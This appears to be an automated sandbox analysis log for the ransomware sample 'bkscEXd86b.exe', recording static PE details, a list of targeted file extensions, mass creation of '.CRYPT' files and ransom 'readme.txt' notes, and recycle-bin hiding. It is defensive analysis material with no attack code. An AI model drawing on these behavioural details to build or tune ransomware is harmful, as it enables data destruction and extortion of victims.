Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: bkscEXd86b.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\bkscEXd86b.exe 'C:\Users\user\Desktop\bkscEXd86b.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388
Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3388 -s 8972
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: unknownProcess created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknownProcess created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile written: C:\$Recycle.Bin\S-1-5-18\desktop.iniJump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: bkscEXd86b.exeStatic file information: File size 1322496 > 1048576
Source: bkscEXd86b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bkscEXd86b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bkscEXd86b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bkscEXd86b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bkscEXd86b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bkscEXd86b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: bkscEXd86b.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: bkscEXd86b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\john\Documents\Visual Studio 2008\Projects\EncryptFile -svcV2\Release\EncryptFile.exe.pdb source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
Source: Binary string: .TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: Binary string: visioitunesvmwarelynconenoteneroexceloutlook.ts.psd.ai&#xEF87.dwgx86amd64LDICobjdobjTOPPFEHbinLRA.vssx.vstxPTMPVD.iniMMUS:wux:.resxMFOL.config.bakIFF.etlIBA.bin.objFL.pdbLM.dllotstotetftutdtrtpto source: SearchUI.exe, 00000010.00000002.392411511.000001DBD0B40000.00000004.00000001.sdmp
Source: Binary string: dear!!!.TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORAWINDIRTEMP source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: bkscEXd86b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bkscEXd86b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bkscEXd86b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bkscEXd86b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bkscEXd86b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C79CB0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00C79CB0
Source: bkscEXd86b.exeStatic PE information: real checksum: 0x143c77 should be: 0x14dd80
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C7087D push ecx; ret 0_2_00C70890
Source: initial sampleStatic PE information: section name: .text entropy: 7.0691412793
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.html.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.html.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.html.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\page_embed_script.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_background.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_window.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\craw_window.css.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\angular.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\cast_sender.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\common.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback.css.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback.html.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\craw_window.html.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\background_script.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback_script.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\material_css_min.css.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_cast_streaming.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_common.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_hangouts.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_webrtc.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\DEFAULT\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\MICROSOFT\PLAYREADY\INTERNET EXPLORER\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\MICROSOFT\PLAYREADY\INTERNET EXPLORER\INPRIVATE\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETCACHE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\TEMP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\APPDATA\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\LOCALCACHE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\LOCALSTATE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\ROAMINGSTATE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\SETTINGS\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\SYSTEMAPPDATA\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\TEMPSTATE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETCOOKIES\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETHISTORY\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCALLOW\ADOBE\ACROBAT\DC\READER\DESKTOPNOTIFICATION\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCALLOW\ADOBE\ACROBAT\DC\READER\DESKTOPNOTIFICATION\NOTIFICATIONSDB\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\BNAGMGSPLO\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\EOWRVPQCCS\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\GAOBCVIQIJ\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\KLIZUSIQEN\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\PALRGUCVEH\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QCFWYSKMHA\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QCOILOQIKC\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QNCYCDFIJJ\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\SQSJKEBWDT\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B92130 StartServiceCtrlDispatcherA,0_2_00B92130

Hooking and other Techniques for Hiding and Protection:

barindex
Creates files in the recycle bin to hide itselfShow sources
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\$Recycle.Bin\S-1-5-18\desktop.ini.CRYPTJump to behavior
Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
